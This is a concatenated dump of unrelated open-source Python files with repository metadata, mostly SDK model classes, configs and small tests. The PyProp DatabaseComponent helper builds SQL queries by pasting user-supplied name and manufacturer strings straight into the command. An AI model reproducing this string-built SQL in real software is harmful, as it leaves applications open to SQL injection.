] | permissive | hemanshu-cohesity/management-sdk-python | 236c44fbd9604809027f8ddd0ae6c36e4e727615 | 07c5adee58810979780679065250d82b4b2cdaab | refs/heads/master | 2020-04-29T23:22:08.909550 | 2019-04-10T02:42:16 | 2019-04-10T02:42:16 | 176,474,523 | 0 | 0 | NOASSERTION | 2019-03-19T09:27:14 | 2019-03-19T09:27:12 | null | UTF-8 | Python | false | false | 2,226 | py | # -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
class HyperFlexStoraeSnapshot(object):
"""Implementation of the 'HyperFlex Storae Snapshot.' model.
Specifies a Storage Snapshot Provider in a HyperFlex environment.
Attributes:
name (string): Specifies a unique name of the Protection Source
product_version (string): Specifies the product version of the
protection source.
mtype (Type5Enum): Specifies the type of managed Object in a HyperFlex
protection source like kServer. Examples of a HyperFlex types
include 'kServer'. 'kServer' indicates HyperFlex server entity.
uuid (string): Specifies the uuid of the protection source.
"""
# Create a mapping from Model property names to API property names
_names = {
"name":'name',
"product_version":'productVersion',
"mtype":'type',
"uuid":'uuid'
}
def __init__(self,
name=None,
product_version=None,
mtype=None,
uuid=None):
"""Constructor for the HyperFlexStoraeSnapshot class"""
# Initialize members of the class
self.name = name
self.product_version = product_version
self.mtype = mtype
self.uuid = uuid
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
name = dictionary.get('name')
product_version = dictionary.get('productVersion')
mtype = dictionary.get('type')
uuid = dictionary.get('uuid')
# Return an object of this model
return cls(name,
product_version,
mtype,
uuid)
| [
"ashish@cohesity.com"
] | ashish@cohesity.com |
0ba165016674eb6222d4c715824556f5bce78ae5 | b3cb41c81069ad2e447a7bab98fd269235996a51 | /pyprop/base_classes.py | 7a2ee646915c15f7198c3e7beb8fc07645d42ef2 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | usuaero/PyProp | e289e8bd64d2d0db51547a808a1f019b37b14fc4 | e568dda610632adf1ab208a6861cca8d8dd84e75 | refs/heads/master | 2023-06-03T01:35:08.525608 | 2021-06-21T16:45:51 | 2021-06-21T16:45:51 | 280,196,572 | 15 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,029 | py | """Defines base classes for the module."""
import os
import sqlite3 as sql
import numpy as np
from .exceptions import DatabaseRecordNotFoundError
class DatabaseComponent:
"""A component defined in the database. DEPRECIATED"""
def __init__(self):
# Get database file
self._db_file = os.path.join(os.path.dirname(__file__), "components.db")
# Set up params
self._table_names = {
"battery" : "Batteries",
"ESC" : "ESCs",
"motor" : "Motors",
"prop" : "Props"
}
def get_database_record(self, component_type, **kwargs):
"""Extracts a record from the database."""
# Get kwargs
name = kwargs.get("name", None)
manufacturer = kwargs.get("manufacturer", None)
dbid = kwargs.get("dbid", None)
capacity = kwargs.get("capacity", None)
I_max = kwargs.get("I_max", None)
Kv = kwargs.get("Kv", None)
diameter = kwargs.get("diameter", None)
pitch = kwargs.get("pitch", None)
# Get database location and connection
with sql.connect(self._db_file) as conn:
db_cur = conn.cursor()
# Format command generically
table_name = self._table_names[component_type]
command = "select * from {0}".format(table_name)
if name is not None:
if manufacturer is not None or dbid is not None:
raise ValueError("Too many {0} parameters specified.".format(component_type))
command = command+" where Name = '"+name+"'"
elif manufacturer is not None:
if dbid is not None:
raise ValueError("Too many {0} parameters specified.".format(component_type))
command = command+" where manufacturer = '"+manufacturer+"'"
elif dbid is not None:
command = command+" where id = "+str(dbid)
# Add component-specific commands
if component_type == "battery" and capacity is not None:
command = command+" order by abs("+str(capacity)+"-Capacity)"
if component_type == "ESC" and I_max is not None:
command = command+" order by abs("+str(I_max)+"-I_motorax)"
if component_type == "motor" and Kv is not None:
command = command+" order by abs("+str(Kv)+"-kv)"
if component_type == "prop" and diameter is not None:
command = command+" order by abs("+str(diameter)+"-Diameter)"
if component_type == "prop" and pitch is not None:
command = command+" order by abs("+str(pitch)+"-Pitch)"
# Get in random order
command = command+" order by RANDOM() limit 1"
# Get record
db_cur.execute(command)
try:
record = np.asarray(db_cur.fetchall())[0]
except IndexError:
raise DatabaseRecordNotFoundError(command)
return record | [
"cory.goates@aggiemail.usu.edu"
] | cory.goates@aggiemail.usu.edu |
7d1d99a28afe14d7c950a3227568d2d3fb4498eb | 8f4f9a07fa25490289b76253971b2ae8c386e8cd | /huaweicloud-sdk-projectman/huaweicloudsdkprojectman/v4/model/show_project_work_hours_response_body_work_hours.py | e4f1bf100e9079db62922dcdfeab16b27c2c9772 | [
"Apache-2.0"
] | permissive | xingkongcwb/huaweicloud-sdk-python-v3 | 5c635af84a9fb4fb37c45a8de38f691724ca5e31 | 007d5c54ff71f0a2d7b52dcc53e3d38dec4fe775 | refs/heads/master | 2023-03-23T09:56:10.606710 | 2021-03-19T12:47:29 | 2021-03-19T12:47:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,094 | py | # coding: utf-8
import pprint
import re
import six
class ShowProjectWorkHoursResponseBodyWorkHours:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'project_name': 'str',
'nick_name': 'str',
'user_name': 'str',
'work_time': 'str',
'work_hours_num': 'str',
'summary': 'str',
'work_hours_type_name': 'str',
'issue_id': 'int',
'issue_type': 'str',
'subject': 'str',
'created_time': 'str',
'closed_time': 'str'
}
attribute_map = {
'project_name': 'project_name',
'nick_name': 'nick_name',
'user_name': 'user_name',
'work_time': 'work_time',
'work_hours_num': 'work_hours_num',
'summary': 'summary',
'work_hours_type_name': 'work_hours_type_name',
'issue_id': 'issue_id',
'issue_type': 'issue_type',
'subject': 'subject',
'created_time': 'created_time',
'closed_time': 'closed_time'
}
def __init__(self, project_name=None, nick_name=None, user_name=None, work_time=None, work_hours_num=None, summary=None, work_hours_type_name=None, issue_id=None, issue_type=None, subject=None, created_time=None, closed_time=None):
"""ShowProjectWorkHoursResponseBodyWorkHours - a model defined in huaweicloud sdk"""
self._project_name = None
self._nick_name = None
self._user_name = None
self._work_time = None
self._work_hours_num = None
self._summary = None
self._work_hours_type_name = None
self._issue_id = None
self._issue_type = None
self._subject = None
self._created_time = None
self._closed_time = None
self.discriminator = None
if project_name is not None:
self.project_name = project_name
if nick_name is not None:
self.nick_name = nick_name
if user_name is not None:
self.user_name = user_name
if work_time is not None:
self.work_time = work_time
if work_hours_num is not None:
self.work_hours_num = work_hours_num
if summary is not None:
self.summary = summary
if work_hours_type_name is not None:
self.work_hours_type_name = work_hours_type_name
if issue_id is not None:
self.issue_id = issue_id
if issue_type is not None:
self.issue_type = issue_type
if subject is not None:
self.subject = subject
if created_time is not None:
self.created_time = created_time
if closed_time is not None:
self.closed_time = closed_time
@property
def project_name(self):
"""Gets the project_name of this ShowProjectWorkHoursResponseBodyWorkHours.
项目名称
:return: The project_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._project_name
@project_name.setter
def project_name(self, project_name):
"""Sets the project_name of this ShowProjectWorkHoursResponseBodyWorkHours.
项目名称
:param project_name: The project_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._project_name = project_name
@property
def nick_name(self):
"""Gets the nick_name of this ShowProjectWorkHoursResponseBodyWorkHours.
用户昵称
:return: The nick_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._nick_name
@nick_name.setter
def nick_name(self, nick_name):
"""Sets the nick_name of this ShowProjectWorkHoursResponseBodyWorkHours.
用户昵称
:param nick_name: The nick_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._nick_name = nick_name
@property
def user_name(self):
"""Gets the user_name of this ShowProjectWorkHoursResponseBodyWorkHours.
用户名
:return: The user_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._user_name
@user_name.setter
def user_name(self, user_name):
"""Sets the user_name of this ShowProjectWorkHoursResponseBodyWorkHours.
用户名
:param user_name: The user_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._user_name = user_name
@property
def work_time(self):
"""Gets the work_time of this ShowProjectWorkHoursResponseBodyWorkHours.
工时日期
:return: The work_time of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._work_time
@work_time.setter
def work_time(self, work_time):
"""Sets the work_time of this ShowProjectWorkHoursResponseBodyWorkHours.
工时日期
:param work_time: The work_time of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._work_time = work_time
@property
def work_hours_num(self):
"""Gets the work_hours_num of this ShowProjectWorkHoursResponseBodyWorkHours.
工时花费
:return: The work_hours_num of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._work_hours_num
@work_hours_num.setter
def work_hours_num(self, work_hours_num):
"""Sets the work_hours_num of this ShowProjectWorkHoursResponseBodyWorkHours.
工时花费
:param work_hours_num: The work_hours_num of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._work_hours_num = work_hours_num
@property
def summary(self):
"""Gets the summary of this ShowProjectWorkHoursResponseBodyWorkHours.
工时内容
:return: The summary of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._summary
@summary.setter
def summary(self, summary):
"""Sets the summary of this ShowProjectWorkHoursResponseBodyWorkHours.
工时内容
:param summary: The summary of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._summary = summary
@property
def work_hours_type_name(self):
"""Gets the work_hours_type_name of this ShowProjectWorkHoursResponseBodyWorkHours.
工时类型
:return: The work_hours_type_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._work_hours_type_name
@work_hours_type_name.setter
def work_hours_type_name(self, work_hours_type_name):
"""Sets the work_hours_type_name of this ShowProjectWorkHoursResponseBodyWorkHours.
工时类型
:param work_hours_type_name: The work_hours_type_name of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._work_hours_type_name = work_hours_type_name
@property
def issue_id(self):
"""Gets the issue_id of this ShowProjectWorkHoursResponseBodyWorkHours.
工作项id
:return: The issue_id of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: int
"""
return self._issue_id
@issue_id.setter
def issue_id(self, issue_id):
"""Sets the issue_id of this ShowProjectWorkHoursResponseBodyWorkHours.
工作项id
:param issue_id: The issue_id of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: int
"""
self._issue_id = issue_id
@property
def issue_type(self):
"""Gets the issue_type of this ShowProjectWorkHoursResponseBodyWorkHours.
工作项类型
:return: The issue_type of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._issue_type
@issue_type.setter
def issue_type(self, issue_type):
"""Sets the issue_type of this ShowProjectWorkHoursResponseBodyWorkHours.
工作项类型
:param issue_type: The issue_type of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._issue_type = issue_type
@property
def subject(self):
"""Gets the subject of this ShowProjectWorkHoursResponseBodyWorkHours.
工作项标题
:return: The subject of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._subject
@subject.setter
def subject(self, subject):
"""Sets the subject of this ShowProjectWorkHoursResponseBodyWorkHours.
工作项标题
:param subject: The subject of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._subject = subject
@property
def created_time(self):
"""Gets the created_time of this ShowProjectWorkHoursResponseBodyWorkHours.
工作项创建时间
:return: The created_time of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._created_time
@created_time.setter
def created_time(self, created_time):
"""Sets the created_time of this ShowProjectWorkHoursResponseBodyWorkHours.
工作项创建时间
:param created_time: The created_time of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._created_time = created_time
@property
def closed_time(self):
"""Gets the closed_time of this ShowProjectWorkHoursResponseBodyWorkHours.
工作项结束时间
:return: The closed_time of this ShowProjectWorkHoursResponseBodyWorkHours.
:rtype: str
"""
return self._closed_time
@closed_time.setter
def closed_time(self, closed_time):
"""Sets the closed_time of this ShowProjectWorkHoursResponseBodyWorkHours.
工作项结束时间
:param closed_time: The closed_time of this ShowProjectWorkHoursResponseBodyWorkHours.
:type: str
"""
self._closed_time = closed_time
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowProjectWorkHoursResponseBodyWorkHours):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
6e6bf914dfaee1862233e9ebd1d7c098ce31e25f | 3e64d1fb4998fae24a4178d0925e0f30e30b00e7 | /venv/lib/python3.8/encodings/cp865.py | 014cd909c595f80e7cacbec3102e9381da502f7e | [] | no_license | viraatdas/Model-Rest-API | a39e150c484c7136141f462932d741de5b45e044 | a08500a28e4ad32094de6f88223088b9a9081d69 | refs/heads/master | 2022-11-12T15:33:06.624474 | 2020-07-05T05:04:50 | 2020-07-05T05:04:50 | 257,821,478 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 82 | py | /Library/Frameworks/Python.framework/Versions/3.8/lib/python3.8/encodings/cp865.py | [
"viraat.laldas@gmail.com"
] | viraat.laldas@gmail.com |
ac44ea363414b315f23f7fbc15c32734924d4a71 | a635b8d51016220a6d84808def431c27dde41b90 | /libcms/apps/contact_form/apps.py | 6b76faf1767e1218cad4697c9243b233da6b320b | [] | no_license | isergey/chel | aab3ac98ae2a10258f7a5afce88c74f9e13a2d7f | d1a38bfe7ebba80d9c39ae3b0d54ebfd2965046c | refs/heads/master | 2023-07-07T02:13:41.363452 | 2023-06-26T10:25:14 | 2023-06-26T10:25:14 | 3,816,204 | 1 | 0 | null | 2023-03-31T14:52:31 | 2012-03-24T09:33:53 | JavaScript | UTF-8 | Python | false | false | 151 | py | from django.apps import AppConfig
class ContactFormConfig(AppConfig):
name = 'contact_form'
verbose_name = 'Контактная форма'
| [
"dostovalov@gmail.com"
] | dostovalov@gmail.com |
861b6bc3e0be629951d00a347532e405e062548d | f68732bc40a7a90c3a1082e4b3a4154518acafbb | /script/dbus/systemBus/power/003_refreshBatteries.py | adf2cc74cbaca7a47c8533a5cd766f34c53db75c | [] | no_license | lizhouquan1017/dbus_demo | 94238a2307e44dabde9f4a4dd0cf8ec217260867 | af8442845e722b258a095e9a1afec9dddfb175bf | refs/heads/master | 2023-02-11T19:46:27.884936 | 2021-01-08T05:27:18 | 2021-01-08T05:27:18 | 327,162,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 783 | py | # -*- coding: utf-8 -*-
# ****************************************************
# @Test Case ID: 003_refreshBatteries
# @Test Description: 刷新所有电池设备的状态
# @Test Condition:
# @Test Step: 1.刷新所有电池设备的状态
# @Test Result: 1.检查刷新成功;
# @Test Remark:
# @Author: ut000511
# *****************************************************
import pytest
from frame.base import OSBase
from aw.dbus.systemBus import power
class TestCase(OSBase):
def setUp(self):
self.Step("预制条件1:无")
@pytest.mark.public
def test_step(self):
self.Step("步骤1:刷新所有电池设备的状态并检查刷新成功")
power.refreshBatteries()
def tearDown(self):
pass
| [
"lizhouquan@uniontech.com"
] | lizhouquan@uniontech.com |
3e93a618cae2c252cafc5fc47b87b17fe445a0ba | 9b862cc2ca6cc29a6efe4e783165bc51a98c7790 | /pmr2/layer/tests/utility.py | 27627c6d5e1e489890c10628a3f0be94be34068a | [] | no_license | PMR2/pmr2.layer | 5b836f76bc9da676a9fab5c8137ebd788ea77c8e | 394f5b99e1a74169ccddb08aa0b5bf5bc3de513d | refs/heads/master | 2020-05-07T16:23:50.692864 | 2015-07-27T05:42:14 | 2015-07-27T05:42:14 | 6,539,922 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 724 | py | import zope.interface
from pmr2.layer.utility import ConditionalLayerApplierBase
class IExampleTestLayer(zope.interface.Interface):
"""Example."""
class ITestLayer1(zope.interface.Interface):
pass
class ITestLayer2(zope.interface.Interface):
pass
class ITestLayer3(ITestLayer1):
pass
class TestLayerApplier(ConditionalLayerApplierBase):
layer = IExampleTestLayer
def condition(self, request):
return 'application/vnd.example.com-v1' in request['HTTP_ACCEPT']
class MultiTestLayerApplier(ConditionalLayerApplierBase):
layer = [ITestLayer1, ITestLayer2, ITestLayer3]
def condition(self, request):
return 'application/vnd.example.com.tests' in request['HTTP_ACCEPT']
| [
"tommy.yu@auckland.ac.nz"
] | tommy.yu@auckland.ac.nz |
693f0a7d80d1732bf677a85c6e6d48f3da5d0d1e | e61e946169b26be9738ba55feb532a4f68844cf6 | /rovid19/urls.py | a0c0d1454a686358a987fa45695bf6f9cd7b809c | [] | no_license | vtemian/rovid19 | 0971c0b0b9c6cd509a93aafb5e298363f36df993 | 0adc193c1ac0c8e3d765d78bd30c08e72af2a60b | refs/heads/master | 2021-09-25T08:08:56.570466 | 2020-03-09T11:56:54 | 2020-03-09T11:59:11 | 246,023,084 | 1 | 0 | null | 2021-09-22T18:42:59 | 2020-03-09T11:55:21 | Python | UTF-8 | Python | false | false | 940 | py | """rovid19 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from rest_framework import routers
from cases.api import views
router = routers.DefaultRouter()
router.register(r'cases', views.CasesViewSet)
urlpatterns = [
path('', include(router.urls)),
path('admin/', admin.site.urls),
]
| [
"vladtemian@gmail.com"
] | vladtemian@gmail.com |
049b6e36c7996d5ca9afedd1bdd9f3df9cf8f786 | 418bb4401b66d2edd6195a3a1b16177a1c341f35 | /paras.py | b0598444d917836404277ca111a72b8bc693fa35 | [] | no_license | victorsoda/TrafficAnalysis | 1cadc55cd82fe1a936af619fad3269d6466ca078 | ce61d8c60aad972ea8ed9c255e50317879a62dba | refs/heads/master | 2021-04-03T09:39:44.882831 | 2019-03-07T08:07:56 | 2019-03-07T08:07:56 | 124,986,491 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,306 | py | import pprint
import numpy as np
data_path = './data/'
volume_file = data_path + 'volume.csv'
travel_time_file = data_path + 'travel_time.csv'
road_id_travel_time_file = data_path + 'road_id_travel_time.csv'
ssid2_road_id_file = data_path + 'ssidA&B_road_id.csv'
lane_direction_file = data_path + 'lane_direction.csv'
origin_data_file = data_path + 'origin_data.csv' # 生成的初始数据文件
door_data_file = data_path + 'door_data.csv' # 使用源代码开门视频的create_examples输出的data,验证pursuit的正确性
example_data_file = data_path + 'example_data.txt' # create_examples生成的文件
result_recorder_file = data_path + 'result_recorder.txt'
TIME_SLICE = 5 # 宣城数据集的时间分片为5分钟
INF = 1e10
pp = pprint.PrettyPrinter()
# print(origin_data_file[:-4])
# a = np.zeros((8, 2))
# print(a)
# row = np.array([0, 0, 1, 1, 0])
# print(list(row) * 4)
# # ind = [2, 3]
# a = {2, 3}
# [x for x in ] += 1
# print(row)
# action_index = np.where(np.array(row) == 1)
# action_index = [x + 1 for x in action_index[0]]
# print(action_index)
# t_val = np.array([[11, 12, 13, 14, 15, 16, 17],
# [21, 22, 23, 24, 25, 26, 27],
# [31, 32, 33, 34, 35, 36, 37]])
# print(t_val[:, 0:3])
# print(t_val[:, 3:])
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
63691433bc972e320295650c2478b9ec64b6db2c | 3b60e6f4bbc011003ac4929f01eb7409918deb79 | /Analysis_v1/Simulation/Pythia/Unparticles/testsplit/testfrag/STest1p5Unp3000p0_M_2000.py | ed61b1033bbad9c751fb25d90d1d0e764933c73e | [] | no_license | uzzielperez/Analyses | d1a64a4e8730325c94e2bc8461544837be8a179d | 1d66fa94763d7847011ea551ee872936c4c401be | refs/heads/master | 2023-02-09T04:54:01.854209 | 2020-09-07T14:57:54 | 2020-09-07T14:57:54 | 120,850,137 | 0 | 0 | null | 2020-06-17T16:48:16 | 2018-02-09T03:14:04 | C++ | UTF-8 | Python | false | false | 1,255 | py | import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
maxEventsToPrint = cms.untracked.int32(1),
pythiaPylistVerbosity = cms.untracked.int32(1),
filterEfficiency = cms.untracked.double(1.0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
comEnergy = cms.double(13000.),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
'ExtraDimensionsUnpart:ffbar2gammagamma = on',
'ExtraDimensionsUnpart:gg2gammagamma = on',
'ExtraDimensionsUnpart:LambdaU = 3000.0',
'ExtraDimensionsUnpart:lambda = 1.0',
'ExtraDimensionsUnpart:dU = 1.5',
#'ExtraDimensionsUnpart:spinU = 2',
'PhaseSpace:pTHatMin = 70.0',
'PhaseSpace:mHatMin = 2000',
'PhaseSpace:mHatMax = 1',
),
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters',
)
)
)
ProductionFilterSequence = cms.Sequence(generator)
| [
"uzzie.perez@cern.ch"
] | uzzie.perez@cern.ch |
9245ad3b8c46ec1710475f237f307cd6276b4300 | 62e58c051128baef9452e7e0eb0b5a83367add26 | /edifact/D96A/PRODEXD96AUN.py | 24832a41a8fb141359e2e8b5b0172a9e2afcaabf | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 968 | py | #Generated by bots open source edi translator from UN-docs.
from bots.botsconfig import *
from edifact import syntax
from recordsD96AUN import recorddefs
structure = [
{ID: 'UNH', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGM', MIN: 1, MAX: 1},
{ID: 'DTM', MIN: 1, MAX: 2},
{ID: 'MEA', MIN: 1, MAX: 1},
{ID: 'NAD', MIN: 1, MAX: 2},
{ID: 'RFF', MIN: 1, MAX: 5, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
]},
{ID: 'IMD', MIN: 1, MAX: 99, LEVEL: [
{ID: 'QTY', MIN: 0, MAX: 10},
{ID: 'LIN', MIN: 0, MAX: 9999, LEVEL: [
{ID: 'GIS', MIN: 0, MAX: 2},
{ID: 'LOC', MIN: 0, MAX: 2},
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'MEA', MIN: 0, MAX: 5},
{ID: 'QTY', MIN: 0, MAX: 5},
{ID: 'TDT', MIN: 0, MAX: 5},
{ID: 'RFF', MIN: 0, MAX: 5, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
]},
]},
]},
{ID: 'UNT', MIN: 1, MAX: 1},
]},
]
| [
"jason.capriotti@gmail.com"
] | jason.capriotti@gmail.com |
88ebbbd5cb8459262007d071855eee9e264076d6 | 382f4acfd565be4aedb07c694e8daa489ff3e70a | /eveutil2/bin/update-markethistory | 1e2c4e1a73d91087594563d88006e87373b3a338 | [] | no_license | electusmatari/legacy | 913c5a9f68074d1fa793b0e3ff76fd3f9c3f481e | 9266e955398a0c8279b82b8347a85d9186a455da | refs/heads/master | 2021-01-22T05:24:13.935562 | 2013-09-29T11:44:19 | 2013-09-29T11:44:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,813 | #!/usr/bin/env python
# CREATE TABLE market_history (
# id SERIAL NOT NULL,
# day DATE NOT NULL,
# regionid BIGINT NOT NULL,
# typeid BIGINT NOT NULL,
# orders BIGINT NOT NULL,
# movement BIGINT NOT NULL,
# max DOUBLE PRECISION NOT NULL,
# avg DOUBLE PRECISION NOT NULL,
# min DOUBLE PRECISION NOT NULL,
# UNIQUE (day, regionid, typeid)
# );
import evelib.newdb as evedb
import emcom.gmi
import datetime
import urllib
import bz2
import StringIO
import csv
import sdb
REGIONS = ['Heimatar', 'Metropolis', 'Molden Heath', 'The Forge']
HISTORIC_URL = "http://export.eve-metrics.com/historic/%s.csv.bz2"
def main():
conn = evedb.connect()
c = conn.cursor()
c.execute("SELECT regionname, regionid FROM ccp.mapregions")
regionids = dict(c.fetchall())
start = datetime.datetime.utcnow() - datetime.timedelta(days=367)
for region in REGIONS:
regionid = regionids[region]
c.execute("SELECT day, typeid FROM market_history "
"WHERE regionid = %s "
" AND day > %s",
(regionid, start))
known_days = {}
for day, typeid in c.fetchall():
known_days.setdefault(typeid, set())
known_days[typeid].add(long(day.strftime("%Y%m%d")))
url = urllib.urlopen(HISTORIC_URL % (regionid,))
rows = csv.reader(StringIO.StringIO(bz2.decompress(url.read())))
for row in rows:
if row[0] == 'type_id':
continue
if len(row) != 7:
print "Bad row: %r" % (row,)
raise RuntimeError()
(type_id, orders, movement, max, avg, min, date) = row
type_id = int(type_id)
orders = long(orders)
movement = long(movement)
max = float(max)
avg = float(avg)
min = float(min)
date = datetime.datetime.strptime(date, "%Y-%m-%d")
if date < start:
continue
datenum = long(date.strftime("%Y%m%d"))
if datenum not in known_days.get(type_id, []):
try:
c.execute("INSERT INTO market_history (day, regionid, "
" typeid, orders, movement, "
" max, avg, min) "
"VALUES (%s, %s, %s, %s, %s, %s, %s, %s)",
(date, regionid, type_id, orders, movement,
max, avg, min))
conn.commit()
except sdb.IntegrityError:
conn.rollback()
# for typerow in emcom.gmi.TYPE_DATA:
# if typerow[1] is not None:
# continue
# for historyrow in evemetrics.history([typerow[0]], regions=REGIONS):
# insert(c, historyrow)
conn.commit()
def isknown(c, day, regionid, typeid):
c.execute("SELECT EXISTS (SELECT * FROM market_history "
"WHERE day = %s "
" AND regionid = %s "
" AND typeid = %s)",
(day, regionid, typeid))
return c.fetchone()[0]
import bz2
class BZReader(object):
def __init__(self, bzstream, bufsize=1024*1024):
self.bzstream = bzstream
self.bufsize = bufsize
def __iter__(self):
buf = ""
decompress = bz2.BZ2Decompressor()
while True:
bzdata = self.bzstream.read(self.bufsize)
if bzdata == '':
if buf != '':
yield buf + "\n"
return
buf += decompress.decompress(bzdata)
while "\n" in buf:
i = buf.index("\n")
line = buf[:i+1]
buf = buf[i+1:]
yield line
if __name__ == '__main__':
main()
| [
"forcer@forcix.cx"
] | forcer@forcix.cx | |
45837862fda78545ccc443790fea864b972febcf | ffb627b58f0553fc8bf86c0d100db1dde2015cfe | /week 1/day5/9093.py | c1d01d603408c6811fa77bb581e0ac4e16eb00b5 | [] | no_license | DentiQ/CodeTest | a208bb1250e18fca9d336b93a5c2e4807c621866 | a8d21447ad2cefc583b45c437623647abde11d95 | refs/heads/master | 2023-06-04T06:12:33.540950 | 2021-06-30T17:00:24 | 2021-06-30T17:00:24 | 363,316,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py | n = int(input())
for i in range(n):
arr = input().split()
ans = []
for word in arr:
ans.append(word[::-1])
print(*ans)
| [
"dentiq0414@gmail.com"
] | dentiq0414@gmail.com |
9aa280d18399f9265f1b7aca41ffadaf74450035 | 781e2692049e87a4256320c76e82a19be257a05d | /assignments/python/wc/src/1378.py | 0e37e33b27dc06733c4d4980b3cd091d677d39e5 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 216 | py | def word_count(phrase):
words = phrase.split()
result = {}
for word in words:
if word in result:
result[word] += 1
else:
result[word] = 1
return result
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
